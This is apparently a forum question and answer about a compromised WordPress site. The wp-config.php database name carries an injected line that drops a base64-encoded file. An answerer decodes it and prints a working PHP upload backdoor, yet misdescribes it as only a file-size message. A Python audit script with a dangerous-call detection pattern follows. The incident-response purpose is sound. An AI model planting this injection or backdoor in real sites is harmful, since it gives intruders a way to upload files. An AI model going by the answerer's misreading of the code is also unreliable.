I am using WordPress and a plug-in called WP-Rocket to optimise my website. Since two days ago, the wp-config.php file keeps having its database name changed to something like the code below.
**Original DB name was define('DB_NAME', 'db1');**
But changed to
**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');
The username and password were also changed to 'user' and 'password' as shown below.
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'password');
This is a security issue. A plugin is changing your config to open a backdoor.
I found this article that can help you: https://secure.wphackedhelp.com/blog/wordpress-backdoor-hack/
I think you have a hacked website. If you decode (https://www.base64decode.org/) the code you will get:
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
   if($_FILES["filename"]["size"] > 1024*3*1024)
   {
     echo ("File too large (more than 3Mb)");
     exit;
   }
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo ("<br>Done!<br>");
   } else {
      echo("<br>Error! ".$php_errormsg."<br>");
   }
}
?>
The code is only a message about the uploaded file size, but I think it's a part of more hacked base64 file parts.
So, now you have 2 options:
1) Hire someone.
2) Or you can go step by step through guides on the internet. This is the first one you can check out on wp.org:
https://codex.wordpress.org/FAQ_My_site_was_hacked#Some_steps_to_take
Hint: If a website is hacked, you should first make it unavailable to visitors, so that nobody can be infected.
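
A read-only triage check for the tampering shown in the question, added here as an example (not code from this thread or from WordPress): it flags `DB_*` `define()` lines that carry anything beyond a plain quoted value, decodes embedded base64 for inspection without executing it, and compares values against a known-good copy. The sample config, the file name `x.php` and the `site_user` value are constructed for illustration.

```python
import base64
import re

# Clean line: define('DB_X', 'value'); with no quote or backslash inside the value.
CLEAN = re.compile(r"""^\s*define\(\s*'(DB_[A-Z_]+)'\s*,\s*'([^'"\\]*)'\s*\);\s*$""")
DEFINE = re.compile(r"""^\s*define\(\s*['"](DB_[A-Z_]+)['"]""")
CALLS = re.compile(r"\b(file_put_contents|base64_decode|eval|assert|system|exec)\s*\(")
B64 = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_blobs(line):
    """Decode base64 runs for inspection only; nothing is executed or written."""
    previews = []
    for blob in B64.findall(line):
        try:
            previews.append(base64.b64decode(blob, validate=True)[:60].decode("latin-1"))
        except ValueError:  # not valid base64, ignore
            continue
    return previews

def audit_wp_config(text, expected=None):
    """Flag DB_* defines that carry extra code or differ from known-good values."""
    expected = expected or {}
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DEFINE.match(line)
        if not m:
            continue
        key, clean = m.group(1), CLEAN.match(line)
        if clean is None:
            findings.append({"line": lineno, "key": key, "issue": "injected-code",
                             "calls": sorted(set(CALLS.findall(line))),
                             "decoded": decode_blobs(line)})
        elif key in expected and clean.group(2) != expected[key]:
            findings.append({"line": lineno, "key": key, "issue": "value-changed",
                             "value": clean.group(2)})
    return findings

# Constructed sample shaped like the tampered lines in the question; the payload is harmless.
_PAYLOAD = base64.b64encode(b'<?php echo "constructed sample"; ?>').decode()
SAMPLE = "\n".join([
    "define('DB_NAME', 'wordpress\\'); file_put_contents(\\\"x.php\\\", base64_decode(\\'"
    + _PAYLOAD + "\\')); /*');",
    "define('DB_USER', 'user');",
    "define('DB_PASSWORD', 'password');",
])
KNOWN_GOOD = {"DB_NAME": "db1", "DB_USER": "site_user"}  # DB_USER value is hypothetical

if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE, KNOWN_GOOD):
        print(finding)
```

Run it against a copy of wp-config.php taken off the server, with the expected values read from a backup made before the change.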